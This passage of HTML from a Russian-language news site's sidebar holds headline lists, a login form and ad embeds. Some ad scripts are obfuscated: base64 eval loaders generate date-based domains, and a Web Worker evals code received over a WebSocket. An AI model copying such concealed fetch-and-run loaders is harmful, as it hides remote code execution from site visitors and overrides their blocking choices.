                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id='tau92omicron6749'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=6749,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('tau92omicron6749').appendChild(p)})();</script>
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ4eXoiXTsgdmFyIHN0ciA9ZGF5Kihtb250aCAqIG5hbWVfZGF5ICogZGF5KSsiIisgZGF5Kihtb250aCArIG5hbWVfZGF5ICsgZGF5ICt5ZWFyKTt2YXIgaGFzaCA9ICBidG9hKGJ0b2Eoc3RyKSkudG9Mb3dlckNhc2UoKTsgdmFyIGhvc3QgPSBoYXNoLnN1YnN0cmluZygzLCBoYXNoLmxlbmd0aCAtIG5hbWVfZGF5LzIpKyIuIitkb21bbmFtZV9kYXkgLSAxXTt2YXIgciA9IE1hdGgucmFuZG9tKCkudG9TdHJpbmcoMzYpLnN1YnN0cigyLCAyKTtyID0gci5yZXBsYWNlKC9bMC05XS9nLCAiIik7dmFyIGRlbHRhID0gTWF0aC5mbG9vcihNYXRoLnJhbmRvbSgpICogKDEwMCAtIDEwICsgMSkpICsgMTA7dmFyIGlkID0gNDc4NiAtIGRlbHRhOyB2YXIgc2NyaXB0X2ZpcnN0ID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7c2NyaXB0X2ZpcnN0LnNyYyA9ICJodHRwczovLyIrIGhvc3QrIi8iK2RlbHRhK2lkK3IrIiI7IG5vZGU0Nzg2LnBhcmVudE5vZGUuYXBwZW5kQ2hpbGQoc2NyaXB0X2ZpcnN0KTtzY3JpcHRfZmlyc3Qub25lcnJvciA9IGZ1bmN0aW9uKCl7IHNldFRpbWVvdXQoIGZ1bmN0aW9uICgpIHsgaWYoIG5vZGU0Nzg2LmlubmVySFRNTCA9PSAiIiApIHdpbmRvdy5ldmFsKGxvY2FsU3RvcmFnZS5nZXRJdGVtKCI0Nzg2IikpIH0sIDUwMDApOyAgO307IA==") );
              }
          }
          </script>
            
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
            <div id="IencjMRQWgr5YuVfVLqO" data-type="2" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/WZuI/GLYm.js" ></script>
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>                
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>10.12-07:45</span>
	<a href="http://hronika.info/avto/377622-eti-sovety-pomogut-zavesti-zaglohshiy-avtomobil.html"><strong title="Эти советы помогут завести заглохший автомобиль">Эти советы помогут завести заглохший автомобиль</strong><b>0</b></a>
</div><div class="newsr_1">
    <span>10.12-07:33</span>
	<a href="http://hronika.info/videonovosti/377617-opasnye-planety-nesuschie-ugrozu-vsemu-zhivomu-video.html"><strong title="Опасные планеты, несущие угрозу всему живому. Видео">Опасные планеты, несущие угрозу всему живому. Видео</strong><b>47</b></a>
</div><div class="newsr_1">
    <span>10.12-07:20</span>
	<a href="http://hronika.info/fotoreportazhi/377616-zabavnye-meksikanskie-blagodarnosti-svyatym-v-kartinkah-foto.html"><strong title="Забавные мексиканские благодарности святым в картинках. Фото">Забавные мексиканские благодарности святым в картинках. Фото</strong><b>129</b></a>
</div><div class="newsr_1">
    <span>10.12-07:07</span>
	<a href="http://hronika.info/medicina/377615-dietologi-sostavili-spisok-luchshih-zhiroszhigayuschih-produktov.html"><strong title="Диетологи составили список лучших жиросжигающих продуктов">Диетологи составили список лучших жиросжигающих продуктов</strong><b>504</b></a>
</div><div class="newsr_1">
    <span>10.12-06:52</span>
	<a href="http://hronika.info/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html"><strong title="Эксперты рассказали о возможном наличии интеллекта у растений">Эксперты рассказали о возможном наличии интеллекта у растений</strong><b>548</b></a>
</div><div class="newsr_1">
    <span>10.12-06:37</span>
	<a href="http://hronika.info/kultura/377613-devid-bekhem-reshilsya-na-peresadku-volos.html"><strong title="Дэвид Бекхэм решился на пересадку волос">Дэвид Бекхэм решился на пересадку волос</strong><b>398</b></a>
</div><div class="newsr_1">
    <span>10.12-06:22</span>
	<a href="http://hronika.info/avto/377612-nazvan-dorozhnyy-shtraf-kotoryy-mozhno-legko-obzhalovat.html"><strong title="Назван дорожный штраф, который можно легко обжаловать">Назван дорожный штраф, который можно легко обжаловать</strong><b>401</b></a>
</div><div class="newsr_1">
    <span>10.12-05:59</span>
	<a href="http://hronika.info/videonovosti/377611-kanadec-na-cadillac-escalade-neudachno-sokratil-dorogu-video.html"><strong title="Канадец на Cadillac Escalade неудачно сократил дорогу. Видео">Канадец на Cadillac Escalade неудачно сократил дорогу. Видео</strong><b>1379</b></a>
</div><div class="newsr_1">
    <span>10.12-05:26</span>
	<a href="http://hronika.info/fotoreportazhi/377610-neizvestnaya-yaponiya-v-staryh-raskrashennyh-snimkah-foto.html"><strong title="Неизвестная Япония в старых раскрашенных снимках. Фото">Неизвестная Япония в старых раскрашенных снимках. Фото</strong><b>553</b></a>
</div><div class="newsr_1">
    <span>10.12-04:53</span>
	<a href="http://hronika.info/medicina/377609-mediki-rasskazali-kak-borotsya-s-postoyannym-zamerzaniem-konechnostey.html"><strong title="Медики рассказали, как бороться с постоянным замерзанием конечностей">Медики рассказали, как бороться с постоянным замерзанием конечностей</strong><b>318</b></a>
</div>
                <div class="vsenovosti" title="Все новости хроники"><a href="/lastnews">Все новости хроники</a></div>
			</div>

               <div class="wrap">
				<h3>События сегодня</h3>           
</div>
   </div>   
   
   <div class="width49-4 fright">
   
   
<!--
<div id="ax_popular_comp">
	<ul class="tabs tshadow ax_tabs" style="height: 31px;">
		<li title="Компетентно" style="width: 147px;"><a href="#ax_comp">Компетентно</a></li>
		<li title="Актуально"><a href="#ax_actual">Актуально</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_comp">
			<div class="b-tab-n1">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html"><img src="/posters/300_131_70_1/uploads/posts/2015-03/thumbs/1426164908_mvf.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-author"><a href="/kompetentno/">Наши эксперты</a></span>
	<span class="b-full-link"><a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html">«Согреют» ли деньги МВФ простых украинцев</a></span>
	
</div>

<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author1"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426164917_lanov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Лановой</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author2"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426164962_zhalilo.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Ярослав Жалило</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author3"><img src="/posters/75_74_70_1/uploads/posts/2015-03/1426165061_dubrov.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Владимир Дубровский</span>
</div>


<div class="b-tab-n2">
	<a href="http://hronika.info/kompetentno/50626-sogreyut-li-dengi-mvf-prostyh-ukraincev.html#author4"><img src="/posters/74_74_70_1/uploads/posts/2015-03/1426165044_shapran.jpg" alt="«Согреют» ли деньги МВФ простых украинцев" title="«Согреют» ли деньги МВФ простых украинцев" /></a>
	<span class="b-full-link">Виталий Шапран</span>
</div>

		</div>			
		<div id="ax_actual">
			 <div class="b-tab-n1">
	<a href="http://hronika.info/politika/377566-advokat-rasskazal-o-sostoyanii-sencova.html"><img src="/posters/300_131_70_1/uploads/posts/2018-12/thumbs/1544383910_sencova.jpg" alt="Адвокат рассказал о состоянии Сенцова" title="Адвокат рассказал о состоянии Сенцова" /></a>
	
	<span class="b-full-link"><a href="http://hronika.info/politika/377566-advokat-rasskazal-o-sostoyanii-sencova.html">Адвокат рассказал о состоянии Сенцова</a></span>

</div>
			 <div class="b-tab-n2">
	<a href="http://hronika.info/politika/377310-poroshenko-prizval-ne-dopustit-revansha-prorossiyskih-sil-v-ukraine.html"><img src="/posters/74_74_70_1/uploads/posts/2018-12/thumbs/1544298083_poroshenko.jpg" alt="Порошенко призвал не допустить реванша пророссийских сил в Украине" title="Порошенко призвал не допустить реванша пророссийских сил в Украине" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/377275-poroshenko-rasskazal-kak-varfolomeyu-ugrozhayut-iz-moskvy.html"><img src="/posters/74_74_70_1/uploads/posts/2018-12/thumbs/1544280798_poroshenko-rasskazal-kak-varfolomeyu-ugrozhayut-iz-moskvy.jpg" alt="Порошенко рассказал, как Варфоломею угрожают из Москвы" title="Порошенко рассказал, как Варфоломею угрожают из Москвы" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/377045-sadovyy-rasskazal-kakim-mediynym-biznesom-vladeet-v-ukraine.html"><img src="/posters/74_74_70_1/uploads/posts/2018-12/thumbs/1544195945_sadovyy.jpg" alt="Садовый рассказал, каким медийным бизнесом владеет в Украине" title="Садовый рассказал, каким медийным бизнесом владеет в Украине" /></a>
	

</div><div class="b-tab-n2">
	<a href="http://hronika.info/politika/377030-parubiy-posetit-yuzhnuyu-koreyu-s-oficialnym-vizitom.html"><img src="/posters/74_74_70_1/uploads/posts/2018-12/thumbs/1544194337_parubiy.jpg" alt="Парубий посетит Южную Корею с официальным визитом" title="Парубий посетит Южную Корею с официальным визитом" /></a>
	

</div>
		</div>			         
	</div>
</div>

<div class="clr"></div>
 

-->      
       


			<div class="wrap">
				<h3 class="inbg">Мнения</h3> 
				<div>
					<div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1878.jpg" />
        <div>07.12.2018|17:00</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2', 'http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/', '0'); return false;" href="http://hronika.info/user/%D0%94%D0%BC%D0%B8%D1%82%D1%80%D0%BE+%D0%A1%D0%BD%D1%94%D0%B3%D0%B8%D1%80%D1%8C%D0%BE%D0%B2/">Дмитро Снєгирьов</a></div>
    	<strong><a href="http://hronika.info/mnenia/376716-pro-divn-spravi-moskovskogo-patrarhatu.html">Про дивні справи Московського патріархату</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1890.jpg" />
        <div>07.12.2018|16:15</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%9F%D0%B0%D0%B2%D0%B5%D0%BB+%D0%9D%D1%83%D1%81%D1%81', 'http://hronika.info/user/%D0%9F%D0%B0%D0%B2%D0%B5%D0%BB+%D0%9D%D1%83%D1%81%D1%81/', '0'); return false;" href="http://hronika.info/user/%D0%9F%D0%B0%D0%B2%D0%B5%D0%BB+%D0%9D%D1%83%D1%81%D1%81/">Павел Нусс</a></div>
    	<strong><a href="http://hronika.info/mnenia/376715-tomos-eto-chast-strategicheskogo-kursa-poroshenko.html">Томос – это часть стратегического курса Порошенко</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1924.jpg" />
        <div>07.12.2018|15:30</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%A2%D0%B0%D1%80%D0%B0%D0%BD/">Виктор Таран</a></div>
    	<strong><a href="http://hronika.info/mnenia/376714-nemaye-zagadki-talantu.html">Немає загадки таланту</a></strong>			
</div><div class="clr greenpeace_n2">
		<img src="/uploads/fotos/foto_1907.jpg" />
        <div>07.12.2018|14:45</div>
		<div class="b-new-author"><a onclick="ShowProfile('%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%9D%D0%B5%D0%B1%D0%BE%D0%B6%D0%B5%D0%BD%D0%BA%D0%BE', 'http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%9D%D0%B5%D0%B1%D0%BE%D0%B6%D0%B5%D0%BD%D0%BA%D0%BE/', '0'); return false;" href="http://hronika.info/user/%D0%92%D0%B8%D0%BA%D1%82%D0%BE%D1%80+%D0%9D%D0%B5%D0%B1%D0%BE%D0%B6%D0%B5%D0%BD%D0%BA%D0%BE/">Виктор Небоженко</a></div>
    	<strong><a href="http://hronika.info/mnenia/376713-chernaya-dyra-rossii.html">«Черная дыра» России</a></strong>			
</div>
				</div>
                <div class="vsenovosti" title="Мнения, рассуждения, аналитика"><a href="/mnenia/">Читать все мнения</a></div>
			</div>
  

	<div class="hrap" >
    
            	﻿


 <div class="fleft authbut"><a class="alert4">Авторизация</a></div> 
 <div class="fright authbut"><a rel="nofollow" href="/index.php?do=register">Регистрация</a></div>
 <div class="clr"></div>
<div id="dim4">
<div class="msgbox">
<div class="msgboxttl"><span></span>Вход на сайт<a class="close">X</a></div>
 		<form method="post" action="#">
				<div id="logentform"><span></span>
                <div class="msgbox_ent">Войти используя учетную запись хроники</div>
					<ul class="reset">
						<li class="logfield"><label for="login_name">Введите E-Mail:</label><input type="text" name="login_name" id="login_name" /></li>
						<li class="logfield"><label for="login_password">Введите Пароль :</label><input type="password" name="login_password" id="login_password" />&nbsp;(<a id="zabyli" href="http://hronika.info/index.php?do=lostpassword">Забыли?</a>)</li><br />
						<li class="zapomnit"><input type="checkbox" name="login_not_save" id="login_not_save" value="1"/><label for="login_not_save">&nbsp;Запомнить меня</label><button onclick="submit();" type="submit" title="Войти">Войти</button></li>
					</ul>
					<input name="login" type="hidden" id="login" value="submit" />
                    <div id="logreg"><a rel="nofollow" href="/index.php?do=register">Зарегистрироваться</a></div>
				</div> 
			</form>
            
            
 <div class="sotsenter">
	
	
	
	
	
	
 </div>

    <div class="clr h40"></div>
 <div class="clr msgbox_b"></div>
       </div>
    </div>

    </div>

    <div class="wrap"> 
        <!-- noindex -->
<div id='kurs-com-ua-informer-main-ukraine-300x130-blue-container'><a href="//old.kurs.com.ua/informer" id="kurs-com-ua-informer-main-ukraine-300x130-blue" title="Курс валют информер Украина" rel="nofollow" target="_blank">Информер курса валют</a></div>
<script type='text/javascript'>
(function() {var iframe = '<ifr'+'ame src="//old.kurs.com.ua/informer/inf2?color=blue" width="300" height="130" frameborder="0" vspace="0" scrolling="no" hspace="0"></ifr'+'ame>';var container = document.getElementById('kurs-com-ua-informer-main-ukraine-300x130-blue');container.parentNode.innerHTML = iframe;})();
</script>
<noscript><img src='//old.kurs.com.ua/static/images/informer/kurs.png' width='52' height='26' alt='kurs.com.ua: курс валют в Украине!' title='Курс валют' border='0' /></noscript>
<!--/ noindex -->  
        
    <div class="wrap">
        
    </div>
        
          
    <div class="wrap">
            	<h3>Новости сегодня</h3>
<div id="FMg6hQON63UZxhcgPUb0" data-type="0" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'hronikka.com';</script>
<script src="//hronikka.com/fR37/h0.js" ></script>
<script id="r17725" type="text/javascript">
    (function() {
        var worker17725,
            tickerID = 17725,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);
        
        var container = document.createElement('div');
            container.id = id;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/17/ticker_17725.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker17725.postMessage(data);
                }

                worker17725 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker17725.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker17725.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>
<div id='beta36theta8254'></div>
<script type='text/javascript'>(function(){function f(v){return Math.abs(v.split('').reduce(function(w,x){return w=(w<<5)-w+x.charCodeAt(0),w&w},0))}function g(v){return(26<=v?g((v/26>>0)-1):'')+'abcdefghijklmnopqrstuvwxyz'[v%26>>0]}var j=673873,r=''+Math.ceil((Date.now()-1.5147648e12)/6.048e8)*j,p=8254,l=''+j+''+p,t=document;p=t.createElement('script'),p.type='text/javascript',p.src='//'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+'.ru/'+g(f(j+r))+(''+f(j+r)).slice(-1)+g(f(j+(r+1)))+l+'.js',t.getElementById('beta36theta8254').appendChild(p)})();</script>
<center><script>
(function(c,o,u,n,t,e,r){
r = c[u](o); r[n] = t; r.async = 1;
r.onload = function(){c['AliExpressBannerGlobalObject'](e)};
c.body.appendChild(r);
})(document, 'script', 'createElement', 'src', '//alishop6.ru/902dy/src.js');
</script>

<div class="some_class"></div>
</center>
    </div>
        

              		<div id="poisk">
					<form method="post" action='#'>
						<input type="hidden" name="do" value="search" />
						<input type="hidden" name="subaction" value="search" />
						<input id="story" name="story" value="Введите поисковый запрос" onblur="if(this.value=='') this.value='Введите поисковый запрос';" onfocus="if(this.value=='Введите поисковый запрос') this.value='';" type="text" />
                        <input  alt="найти" type="image" src="/templates/hronika/images/poisk.png" />
					</form>
				</div>
			</div>
             
           
                       
            <div class="wrap bshadow">
				<h3 class="inbg">Самое интересное за неделю</h3> 				

<div id="ax_popular_obs">
	<ul class="tabs tshadow ax_tabs" style="height: 25px;">
		<li title="Обсуждаемое"><a href="#ax_obs">Обсуждаемое</a></li>
		<li title="Популярное"><a href="#ax_popular">Популярное</a></li>		
	</ul>
	<div class="clr tabwrap">		
		<div id="ax_obs">
			 <div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/377622-eti-sovety-pomogut-zavesti-zaglohshiy-avtomobil.html"><span>10.12-07:45</span>
	<strong title="Эти советы помогут завести заглохший автомобиль">Эти советы помогут завести заглохший автомобиль</strong></a><b>0</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/377617-opasnye-planety-nesuschie-ugrozu-vsemu-zhivomu-video.html"><span>10.12-07:33</span>
	<strong title="Опасные планеты, несущие угрозу всему живому. Видео">Опасные планеты, несущие угрозу всему живому. Видео</strong></a><b>47</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/377615-dietologi-sostavili-spisok-luchshih-zhiroszhigayuschih-produktov.html"><span>10.12-07:07</span>
	<strong title="Диетологи составили список лучших жиросжигающих продуктов">Диетологи составили список лучших жиросжигающих продуктов</strong></a><b>504</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/377614-eksperty-rasskazali-o-vozmozhnom-nalichii-intellekta-u-rasteniy.html"><span>10.12-06:52</span>
	<strong title="Эксперты рассказали о возможном наличии интеллекта у растений">Эксперты рассказали о возможном наличии интеллекта у растений</strong></a><b>548</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/377613-devid-bekhem-reshilsya-na-peresadku-volos.html"><span>10.12-06:37</span>
	<strong title="Дэвид Бекхэм решился на пересадку волос">Дэвид Бекхэм решился на пересадку волос</strong></a><b>398</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/avto/377612-nazvan-dorozhnyy-shtraf-kotoryy-mozhno-legko-obzhalovat.html"><span>10.12-06:22</span>
	<strong title="Назван дорожный штраф, который можно легко обжаловать">Назван дорожный штраф, который можно легко обжаловать</strong></a><b>401</b><div class="category_lastn_date" title="Авто">&nbsp;&nbsp;<a href="http://hronika.info/avto/">Авто</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/videonovosti/377611-kanadec-na-cadillac-escalade-neudachno-sokratil-dorogu-video.html"><span>10.12-05:59</span>
	<strong title="Канадец на Cadillac Escalade неудачно сократил дорогу. Видео">Канадец на Cadillac Escalade неудачно сократил дорогу. Видео</strong></a><b>1379</b><div class="category_lastn_date" title="Видеоновости">&nbsp;&nbsp;<a href="http://hronika.info/videonovosti/">Видеоновости</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/medicina/377609-mediki-rasskazali-kak-borotsya-s-postoyannym-zamerzaniem-konechnostey.html"><span>10.12-04:53</span>
	<strong title="Медики рассказали, как бороться с постоянным замерзанием конечностей">Медики рассказали, как бороться с постоянным замерзанием конечностей</strong></a><b>318</b><div class="category_lastn_date" title="Медицина">&nbsp;&nbsp;<a href="http://hronika.info/medicina/">Медицина</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/neverojatnoe/377608-uchenye-predupredili-o-kardinalnom-izmenenii-klimata-v-2019-godu.html"><span>10.12-04:22</span>
	<strong title="Ученые предупредили о кардинальном изменении климата в 2019 году">Ученые предупредили о кардинальном изменении климата в 2019 году</strong></a><b>2765</b><div class="category_lastn_date" title="Невероятное">&nbsp;&nbsp;<a href="http://hronika.info/neverojatnoe/">Невероятное</a></div>
</div><div class="s-zelenoy-categoriey">
    <a href="http://hronika.info/kultura/377607-izvestnaya-aktrisa-vpervye-stanet-babushkoy.html"><span>10.12-03:48</span>
	<strong title="Известная актриса впервые станет бабушкой">Известная актриса впервые станет бабушкой</strong></a><b>685</b><div class="category_lastn_date" title="Культура">&nbsp;&nbsp;<a href="http://hronika.info/kultura/">Культура</a></div>
</div>
			
		</div>			
		<div id="ax_popular">
		   <div class="s-zelenoy-categoriey">
